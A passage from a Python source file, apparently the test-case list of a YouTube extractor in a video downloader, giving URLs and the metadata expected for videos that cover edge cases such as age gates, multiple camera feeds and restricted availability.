'channel_id': 'UCzybXLxv08IApdjdN0mJhEg',
'playable_in_embed': True,
'view_count': int,
'channel_follower_count': int
},
},
{
'note': 'Age-gate video with embed allowed in public site',
'url': 'https://youtube.com/watch?v=HsUATh_Nc2U',
'info_dict': {
'id': 'HsUATh_Nc2U',
'ext': 'mp4',
'title': 'Godzilla 2 (Official Video)',
'description': 'md5:bf77e03fcae5529475e500129b05668a',
'upload_date': '20200408',
'uploader_id': 'FlyingKitty900',
'uploader': 'FlyingKitty',
'age_limit': 18,
'availability': 'needs_auth',
'channel_id': 'UCYQT13AtrJC0gsM1far_zJg',
'uploader_url': 'http://www.youtube.com/user/FlyingKitty900',
'channel': 'FlyingKitty',
'channel_url': 'https://www.youtube.com/channel/UCYQT13AtrJC0gsM1far_zJg',
'view_count': int,
'categories': ['Entertainment'],
'live_status': 'not_live',
'tags': ['Flyingkitty', 'godzilla 2'],
'thumbnail': 'https://i.ytimg.com/vi/HsUATh_Nc2U/maxresdefault.jpg',
'like_count': int,
'duration': 177,
'playable_in_embed': True,
'channel_follower_count': int
},
},
{
'note': 'Age-gate video embedable only with clientScreen=EMBED',
'url': 'https://youtube.com/watch?v=Tq92D6wQ1mg',
'info_dict': {
'id': 'Tq92D6wQ1mg',
'title': '[MMD] Adios - EVERGLOW [+Motion DL]',
'ext': 'mp4',
'upload_date': '20191228',
'uploader_id': 'UC1yoRdFoFJaCY-AGfD9W0wQ',
'uploader': 'Projekt Melody',
'description': 'md5:17eccca93a786d51bc67646756894066',
'age_limit': 18,
'like_count': int,
'availability': 'needs_auth',
'uploader_url': 'http://www.youtube.com/channel/UC1yoRdFoFJaCY-AGfD9W0wQ',
'channel_id': 'UC1yoRdFoFJaCY-AGfD9W0wQ',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi_webp/Tq92D6wQ1mg/sddefault.webp',
'channel': 'Projekt Melody',
'live_status': 'not_live',
'tags': ['mmd', 'dance', 'mikumikudance', 'kpop', 'vtuber'],
'playable_in_embed': True,
'categories': ['Entertainment'],
'duration': 106,
'channel_url': 'https://www.youtube.com/channel/UC1yoRdFoFJaCY-AGfD9W0wQ',
'channel_follower_count': int
},
},
{
'note': 'Non-Agegated non-embeddable video',
'url': 'https://youtube.com/watch?v=MeJVWBSsPAY',
'info_dict': {
'id': 'MeJVWBSsPAY',
'ext': 'mp4',
'title': 'OOMPH! - Such Mich Find Mich (Lyrics)',
'uploader': 'Herr Lurik',
'uploader_id': 'st3in234',
'description': 'Fan Video. Music & Lyrics by OOMPH!.',
'upload_date': '20130730',
'track': 'Such mich find mich',
'age_limit': 0,
'tags': ['oomph', 'such mich find mich', 'lyrics', 'german industrial', 'musica industrial'],
'like_count': int,
'playable_in_embed': False,
'creator': 'OOMPH!',
'thumbnail': 'https://i.ytimg.com/vi/MeJVWBSsPAY/sddefault.jpg',
'view_count': int,
'alt_title': 'Such mich find mich',
'duration': 210,
'channel': 'Herr Lurik',
'channel_id': 'UCdR3RSDPqub28LjZx0v9-aA',
'categories': ['Music'],
'availability': 'public',
'uploader_url': 'http://www.youtube.com/user/st3in234',
'channel_url': 'https://www.youtube.com/channel/UCdR3RSDPqub28LjZx0v9-aA',
'live_status': 'not_live',
'artist': 'OOMPH!',
'channel_follower_count': int
},
},
{
'note': 'Non-bypassable age-gated video',
'url': 'https://youtube.com/watch?v=Cr381pDsSsA',
'only_matching': True,
},
# video_info is None (https://github.com/ytdl-org/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:6cbcd3a92ce1bc676fc4d6ab4ace2336',
'uploader': 'deadmau5',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
'availability': 'public',
'tags': 'count:14',
'channel_id': 'UCYEK6xds6eo-3tr4xRdflmQ',
'view_count': int,
'live_status': 'not_live',
'channel': 'deadmau5',
'thumbnail': 'https://i.ytimg.com/vi_webp/__2ABJjxzNo/maxresdefault.webp',
'like_count': int,
'track': 'Some Chords',
'artist': 'deadmau5',
'playable_in_embed': True,
'age_limit': 0,
'channel_url': 'https://www.youtube.com/channel/UCYEK6xds6eo-3tr4xRdflmQ',
'categories': ['Music'],
'album': 'Some Chords',
'channel_follower_count': int
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/ytdl-org/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympics',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
'like_count': int,
'release_timestamp': 1343767800,
'playable_in_embed': True,
'categories': ['Sports'],
'release_date': '20120731',
'channel': 'Olympics',
'tags': ['Hockey', '2012-07-31', '31 July 2012', 'Riverbank Arena', 'Session', 'Olympics', 'Olympic Games', 'London 2012', '2012 Summer Olympics', 'Summer Games'],
'channel_id': 'UCTl3QQTvqHFjurroKxexy2Q',
'thumbnail': 'https://i.ytimg.com/vi/lqQg6PlCWgI/maxresdefault.jpg',
'age_limit': 0,
'availability': 'public',
'live_status': 'was_live',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCTl3QQTvqHFjurroKxexy2Q',
'channel_follower_count': int
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
'playable_in_embed': True,
'channel': '孫ᄋᄅ',
'age_limit': 0,
'tags': 'count:11',
'channel_url': 'https://www.youtube.com/channel/UCS-xxCmRaA6BFdmgDPA_BIw',
'channel_id': 'UCS-xxCmRaA6BFdmgDPA_BIw',
'thumbnail': 'https://i.ytimg.com/vi/_b-2C3KPAM0/maxresdefault.jpg',
'view_count': int,
'categories': ['People & Blogs'],
'like_count': int,
'live_status': 'not_live',
'availability': 'unlisted',
'channel_follower_count': int
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/ytdl-org/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jvGDaLqkpTg',
'info_dict': {
'id': 'jvGDaLqkpTg',
'title': 'Tom Clancy Free Weekend Rainbow Whatever',
'description': 'md5:e03b909557865076822aa169218d6a5d',
},
'playlist': [{
'info_dict': {
'id': 'jvGDaLqkpTg',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Main Camera)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10643,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': '3AKt1R1aDnw',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 2)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10991,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': 'RtAMM00gpVc',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 3)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10995,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}, {
'info_dict': {
'id': '6N2fdlP3C5U',
'ext': 'mp4',
'title': 'Tom Clancy Free Weekend Rainbow Whatever (Camera 4)',
'description': 'md5:e03b909557865076822aa169218d6a5d',
'duration': 10990,
'upload_date': '20161111',
'uploader': 'Team PGP',
'uploader_id': 'UChORY56LMMETTuGjXaJXvLg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UChORY56LMMETTuGjXaJXvLg',
},
}],
'params': {
'skip_download': True,
},
'skip': 'Not multifeed anymore',
},
{
# Multifeed video with comma in title (see https://github.com/ytdl-org/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/ytdl-org/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/ytdl-org/youtube-dl/issues/1892,
# https://github.com/ytdl-org/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'creator': 'Todd Haberman;\nDaniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk',
'artist': 'Todd Haberman;\nDaniel Law Heath and Aaron Kaplan',
'album': 'Position Music - Production Music Vol. 143 - Dark Walk',
'thumbnail': 'https://i.ytimg.com/vi_webp/lsguqyKfVQg/maxresdefault.webp',
'categories': ['Film & Animation'],
'view_count': int,
'live_status': 'not_live',
'channel_url': 'https://www.youtube.com/channel/UCTSRgz5jylBvFt_S7wnsqLQ',
'channel_id': 'UCTSRgz5jylBvFt_S7wnsqLQ',
'tags': 'count:13',
'availability': 'public',
'channel': 'IronSoulElf',
'playable_in_embed': True,
'like_count': int,
'age_limit': 0,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/ytdl-org/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video with incomplete 'yt:stretch=16:'
'url': 'https://www.youtube.com/watch?v=FRhJzUSJbGI',
'only_matching': True,
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150128',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
'channel_id': 'UCuLGmD72gJDBwmLw06X58SA',
'channel_url': 'https://www.youtube.com/channel/UCuLGmD72gJDBwmLw06X58SA',
'like_count': int,
'age_limit': 0,
'tags': ['Copyright (Legal Subject)', 'Law (Industry)', 'William W. Fisher (Author)'],
'channel': 'The Berkman Klein Center for Internet & Society',
'availability': 'public',
'view_count': int,
'categories': ['Education'],
'thumbnail': 'https://i.ytimg.com/vi_webp/M4gD1WSo5mA/maxresdefault.webp',
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:13a2503d7b5904ef4b223aa101628f39',
'duration': 4060,
'upload_date': '20151120',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
'playable_in_embed': True,
'tags': 'count:12',
'like_count': int,
'channel_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'age_limit': 0,
'availability': 'public',
'categories': ['News & Politics'],
'channel': 'Bernie Sanders',
'thumbnail': 'https://i.ytimg.com/vi_webp/eQcmzGIKrzg/maxresdefault.webp',
'view_count': int,
'live_status': 'not_live',
'channel_url': 'https://www.youtube.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/ytdl-org/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:f540112edec5d09fc8cc752d3d4ba3cd',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
'thumbnail': 'https://i.ytimg.com/vi_webp/iqKdEhx-dD4/maxresdefault.webp',
'tags': 'count:12',
'view_count': int,
'availability': 'public',
'age_limit': 0,
'channel': 'Vsauce',
'episode': 'Episode 1',
'categories': ['Entertainment'],
'season': 'Season 1',
'channel_id': 'UC6nSFpj9HTCZ5t-N3Rm3-HA',
'channel_url': 'https://www.youtube.com/channel/UC6nSFpj9HTCZ5t-N3Rm3-HA',
'like_count': int,
'playable_in_embed': True,
'live_status': 'not_live',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
},
'params': {
'skip_download': True,
},
'skip': 'This video has been removed for violating YouTube\'s policy on hate speech.',
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://invidio.us/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
'url': 'https://redirect.invidious.io/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
# from https://nitter.pussthecat.org/YouTube/status/1360363141947944964#m
'url': 'https://redirect.invidious.io/Yh0AhrY9GjA',
'only_matching': True,
},
{
# DRM protected
'url': 'https://www.youtube.com/watch?v=s7_qI6_mIXc',
'only_matching': True,
},
{
# Video with unsupported adaptive stream type formats
'url': 'https://www.youtube.com/watch?v=Z4Vy8R84T1U',
'info_dict': {
'id': 'Z4Vy8R84T1U',
'ext': 'mp4',
'title': 'saman SMAN 53 Jakarta(Sancety) opening COFFEE4th at SMAN 53 Jakarta',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'duration': 433,
'upload_date': '20130923',
'uploader': 'Amelia Putri Harwita',
'uploader_id': 'UCpOxM49HJxmC1qCalXyB3_Q',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCpOxM49HJxmC1qCalXyB3_Q',
'formats': 'maxcount:10',
},
'params': {
'skip_download': True,
'youtube_include_dash_manifest': False,
},
'skip': 'not actual anymore',
},
{
# Youtube Music Auto-generated description
'url': 'https://music.youtube.com/watch?v=MgNrAu2pzNs',
'info_dict': {
'id': 'MgNrAu2pzNs',
'ext': 'mp4',
'title': 'Voyeur Girl',
'description': 'md5:7ae382a65843d6df2685993e90a8628f',
'upload_date': '20190312',
'uploader': 'Stephen - Topic',
'uploader_id': 'UC-pWHpBjdGG69N9mM2auIAA',
'artist': 'Stephen',
'track': 'Voyeur Girl',
'album': 'it\'s too much love to know my dear',
'release_date': '20190313',
'release_year': 2019,
'alt_title': 'Voyeur Girl',
'view_count': int,
'uploader_url': 'http://www.youtube.com/channel/UC-pWHpBjdGG69N9mM2auIAA',
'playable_in_embed': True,
'like_count': int,
'categories': ['Music'],
'channel_url': 'https://www.youtube.com/channel/UC-pWHpBjdGG69N9mM2auIAA',
'channel': 'Stephen',
'availability': 'public',
'creator': 'Stephen',
'duration': 169,
'thumbnail': 'https://i.ytimg.com/vi_webp/MgNrAu2pzNs/maxresdefault.webp',
'age_limit': 0,
'channel_id': 'UC-pWHpBjdGG69N9mM2auIAA',
'tags': 'count:11',
'live_status': 'not_live',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtubekids.com/watch?v=3b8nCWDgZ6Q',
'only_matching': True,
},
{
# invalid -> valid video id redirection
'url': 'DJztXj2GPfl',
'info_dict': {
'id': 'DJztXj2GPfk',
'ext': 'mp4',
'title': 'Panjabi MC - Mundian To Bach Ke (The Dictator Soundtrack)',
'description': 'md5:bf577a41da97918e94fa9798d9228825',
'upload_date': '20090125',
'uploader': 'Prochorowka',
'uploader_id': 'Prochorowka',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Prochorowka',
'artist': 'Panjabi MC',
'track': 'Beware of the Boys (Mundian to Bach Ke) - Motivo Hi-Lectro Remix',
'album': 'Beware of the Boys (Mundian To Bach Ke)',
},
'params': {
'skip_download': True,
},
'skip': 'Video unavailable',
},
{
# empty description results in an empty string
'url': 'https://www.youtube.com/watch?v=x41yOUIvK2k',
'info_dict': {
'id': 'x41yOUIvK2k',
'ext': 'mp4',
'title': 'IMG 3456',
'description': '',
'upload_date': '20170613',
'uploader_id': 'ElevageOrVert',
'uploader': 'ElevageOrVert',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi_webp/x41yOUIvK2k/maxresdefault.webp',
'uploader_url': 'http://www.youtube.com/user/ElevageOrVert',
'like_count': int,
'channel_id': 'UCo03ZQPBW5U4UC3regpt1nw',
'tags': [],
'channel_url': 'https://www.youtube.com/channel/UCo03ZQPBW5U4UC3regpt1nw',
'availability': 'public',
'age_limit': 0,
'categories': ['Pets & Animals'],
'duration': 7,
'playable_in_embed': True,
'live_status': 'not_live',
'channel': 'ElevageOrVert',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# with '};' inside yt initial data (see [1])
# see [2] for an example with '};' inside ytInitialPlayerResponse
# 1. https://github.com/ytdl-org/youtube-dl/issues/27093
# 2. https://github.com/ytdl-org/youtube-dl/issues/27216
'url': 'https://www.youtube.com/watch?v=CHqg6qOn4no',
'info_dict': {
'id': 'CHqg6qOn4no',
'ext': 'mp4',
'title': 'Part 77 Sort a list of simple types in c#',
'description': 'md5:b8746fa52e10cdbf47997903f13b20dc',
'upload_date': '20130831',
'uploader_id': 'kudvenkat',
'uploader': 'kudvenkat',
'channel_id': 'UCCTVrRB5KpIiK6V2GGVsR1Q',
'like_count': int,
'uploader_url': 'http://www.youtube.com/user/kudvenkat',
'channel_url': 'https://www.youtube.com/channel/UCCTVrRB5KpIiK6V2GGVsR1Q',
'live_status': 'not_live',
'categories': ['Education'],
'availability': 'public',
'thumbnail': 'https://i.ytimg.com/vi/CHqg6qOn4no/sddefault.jpg',
'tags': 'count:12',
'playable_in_embed': True,
'age_limit': 0,
'view_count': int,
'duration': 522,
'channel': 'kudvenkat',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# another example of '};' in ytInitialData
'url': 'https://www.youtube.com/watch?v=gVfgbahppCY',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch_popup?v=63RmMXCd_bQ',
'only_matching': True,
},
{
# https://github.com/ytdl-org/youtube-dl/pull/28094
'url': 'OtqTfy26tG0',
'info_dict': {
'id': 'OtqTfy26tG0',
'ext': 'mp4',
'title': 'Burn Out',
'description': 'md5:8d07b84dcbcbfb34bc12a56d968b6131',
'upload_date': '20141120',
'uploader': 'The Cinematic Orchestra - Topic',
'uploader_id': 'UCIzsJBIyo8hhpFm1NK0uLgw',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCIzsJBIyo8hhpFm1NK0uLgw',
'artist': 'The Cinematic Orchestra',
'track': 'Burn Out',
'album': 'Every Day',
'like_count': int,
'live_status': 'not_live',
'alt_title': 'Burn Out',
'duration': 614,
'age_limit': 0,
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCIzsJBIyo8hhpFm1NK0uLgw',
'creator': 'The Cinematic Orchestra',
'channel': 'The Cinematic Orchestra',
'tags': ['The Cinematic Orchestra', 'Every Day', 'Burn Out'],
'channel_id': 'UCIzsJBIyo8hhpFm1NK0uLgw',
'availability': 'public',
'thumbnail': 'https://i.ytimg.com/vi/OtqTfy26tG0/maxresdefault.jpg',
'categories': ['Music'],
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
# controversial video, only works with bpctr when authenticated with cookies
'url': 'https://www.youtube.com/watch?v=nGC3D_FkCmg',
'only_matching': True,
},
{
# controversial video, requires bpctr/contentCheckOk
'url': 'https://www.youtube.com/watch?v=SZJvDhaSDnc',
'info_dict': {
'id': 'SZJvDhaSDnc',
'ext': 'mp4',
'title': 'San Diego teen commits suicide after bullying over embarrassing video',
'channel_id': 'UC-SJ6nODDmufqBzPBwCvYvQ',
'uploader': 'CBS Mornings',
'uploader_id': 'CBSThisMorning',
'upload_date': '20140716',
'description': 'md5:acde3a73d3f133fc97e837a9f76b53b7',
'duration': 170,
'categories': ['News & Politics'],
'uploader_url': 'http://www.youtube.com/user/CBSThisMorning',
'view_count': int,
'channel': 'CBS Mornings',
'tags': ['suicide', 'bullying', 'video', 'cbs', 'news'],
'thumbnail': 'https://i.ytimg.com/vi/SZJvDhaSDnc/hqdefault.jpg',
'age_limit': 18,
'availability': 'needs_auth',
'channel_url': 'https://www.youtube.com/channel/UC-SJ6nODDmufqBzPBwCvYvQ',
'like_count': int,
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
}
},
{
# restricted location, https://github.com/ytdl-org/youtube-dl/issues/28685
'url': 'cBvYw8_A0vQ',
'info_dict': {
'id': 'cBvYw8_A0vQ',
'ext': 'mp4',
'title': '4K Ueno Okachimachi Street Scenes 上野御徒町歩き',
'description': 'md5:ea770e474b7cd6722b4c95b833c03630',
'upload_date': '20201120',
'uploader': 'Walk around Japan',
'uploader_id': 'UC3o_t8PzBmXf5S9b7GLx1Mw',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UC3o_t8PzBmXf5S9b7GLx1Mw',
'duration': 1456,
'categories': ['Travel & Events'],
'channel_id': 'UC3o_t8PzBmXf5S9b7GLx1Mw',
'view_count': int,
'channel': 'Walk around Japan',
'tags': ['Ueno Tokyo', 'Okachimachi Tokyo', 'Ameyoko Street', 'Tokyo attraction', 'Travel in Tokyo'],
'thumbnail': 'https://i.ytimg.com/vi_webp/cBvYw8_A0vQ/hqdefault.webp',
'age_limit': 0,
'availability': 'public',
'channel_url': 'https://www.youtube.com/channel/UC3o_t8PzBmXf5S9b7GLx1Mw',
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
}, {
# Has multiple audio streams
'url': 'WaOKSUlf4TM',
'only_matching': True
}, {
# Requires Premium: has format 141 when requested using YTM url
'url': 'https://music.youtube.com/watch?v=XclachpHxis',
'only_matching': True
}, {
# multiple subtitles with same lang_code
'url': 'https://www.youtube.com/watch?v=wsQiKKfKxug',
'only_matching': True,
}, {
# Force use android client fallback
'url': 'https://www.youtube.com/watch?v=YOelRv7fMxY',
'info_dict': {
'id': 'YOelRv7fMxY',
'title': 'DIGGING A SECRET TUNNEL Part 1',
'ext': '3gp',
'upload_date': '20210624',
'channel_id': 'UCp68_FLety0O-n9QU6phsgw',
'uploader': 'colinfurze',
'uploader_id': 'colinfurze',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCp68_FLety0O-n9QU6phsgw',
'description': 'md5:5d5991195d599b56cd0c4148907eec50',
'duration': 596,
'categories': ['Entertainment'],
'uploader_url': 'http://www.youtube.com/user/colinfurze',
'view_count': int,
'channel': 'colinfurze',
'tags': ['Colin', 'furze', 'Terry', 'tunnel', 'underground', 'bunker'],
'thumbnail': 'https://i.ytimg.com/vi/YOelRv7fMxY/maxresdefault.jpg',
'age_limit': 0,
'availability': 'public',
'like_count': int,
'live_status': 'not_live',
'playable_in_embed': True,
'channel_follower_count': int
},
'params': {
'format': '17', # 3gp format available on android
'extractor_args': {'youtube': {'player_client': ['android']}},
},
},
{
# Skip download of additional client configs (remix client config in this case)
'url': 'https://music.youtube.com/watch?v=MgNrAu2pzNs',
'only_matching': True,
'params': {
'extractor_args': {'youtube': {'player_skip': ['configs']}},
},
}, {
# shorts
'url': 'https://www.youtube.com/shorts/BGQWPY4IigY',
'only_matching': True,
}, {
'note': 'Storyboards',
'url': 'https://www.youtube.com/watch?v=5KLPxDtMqe8',
'info_dict': {
'id': '5KLPxDtMqe8',
'ext': 'mhtml',
'format_id': 'sb0',
'title': 'Your Brain is Plastic',
'uploader_id': 'scishow',
'description': 'md5:89cd86034bdb5466cd87c6ba206cd2bc',
'upload_date': '20140324',
'uploader': 'SciShow',
'like_count': int,
'channel_id': 'UCZYTClx2T1of7BRZ86-8fow',
'channel_url': 'https://www.youtube.com/channel/UCZYTClx2T1of7BRZ86-8fow',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi/5KLPxDtMqe8/maxresdefault.jpg',
'playable_in_embed': True,
'tags': 'count:12',
'uploader_url': 'http://www.youtube.com/user/scishow',
'availability': 'public',
